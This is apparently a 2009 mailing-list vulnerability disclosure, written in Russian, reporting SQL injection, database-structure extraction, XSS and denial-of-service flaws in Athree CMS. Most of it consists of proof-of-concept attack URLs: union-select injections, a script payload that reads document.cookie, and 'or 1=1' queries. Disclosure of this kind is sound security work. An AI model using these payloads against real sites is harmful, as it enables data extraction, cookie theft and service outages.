Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

TikiWiki 2.2 XSS Vulnerability in URI

Trellis Desk v1.0 XSS Vulnerability

SEC Consult SA-20090305-0 :: NextApp Echo XML Injection Vulnerability

Sun Java System Communications Express [HTML Injection]

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	12.03.2009
Subject:	Multiple vulnerabilities in Athree CMS

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною SQL DB Structure
Extraction, SQL Injection, Cross-Site Scripting и Denial
of Service уязвимостях в системе Athree CMS.

SQL DB Structure Extraction:

http://site/?p=1;c=1?;s=1

SQL Injection:

http://site/?p=1;c=1;s=1%20and%20version()%3E4

http://site/?p=1;c=1%20and%20version()%3E4;s=1

http://site/?p=-1%20union%20select%20version(),1,
1/*;c=1;s=1

XSS (через SQL Injection):

http://site/?p=-
1%20union%20select%20'%3Cscript%3Ealert(document.
cookie)%3C/script%3E',1,1/*;c=1;s=1

DoS (через SQL Injection):

http://site/?p=1;c=1;s=-1%20or%201=1/*

http://site/?p=1%20or%201=1/*;c=1;s=1

Дополнительная информация о данных уязвимостях у меня
на сайте:
http://websecurity.com.ua/2227/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua